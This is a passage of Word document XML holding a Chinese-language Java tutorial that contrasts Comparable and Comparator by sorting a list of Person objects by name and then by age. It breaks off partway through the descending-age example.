        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>接口，那么它就是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。其它的类，可以根据该比较器去排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> *</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> *   </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>综上所述：</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>是内部比较器，而</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>是外部比较器。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> *   </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>一个类本身实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较器，就意味着它本身支持排序；若它本身没实现</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparable</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，也可以通过外部比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序。</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t> */</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>public class CompareComparatorAndComparableTest{</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>    public static void main(String[] args) {</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ArrayList(</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>动态数组</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        ArrayList&lt;Person&gt; list = new ArrayList&lt;Person&gt;();</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>添加对象到</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        list.add(new Person("ccc", 20));</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        list.add(new Person("AAA", 30));</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        list.add(new Person("bbb", 10));</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        list.add(new Person("ddd", 40));</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>打印</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的原始序列</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.printf("Original  sort, list:%s\n", list);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这里会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“Person</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>实现的</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Comparable&lt;String&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序，即会根据</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“name”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        Collections.sort(list);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        System.out.printf("Name      sort, list:%s\n", list);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(AscAgeComparator)”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，对</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>进行排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        // AscAgeComparator</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的排序方式是：根据</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“age”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的升序排序</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t>        Collections.sort(list, new AscAgeComparator());</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>        System.out.printf("Asc(age)  sort, list:%s\n", list);</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>比较器</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>(DescAgeComparator)”</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，对</w:t>
      </w:r>
      <w:r w:rsidRPr="008227AA">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
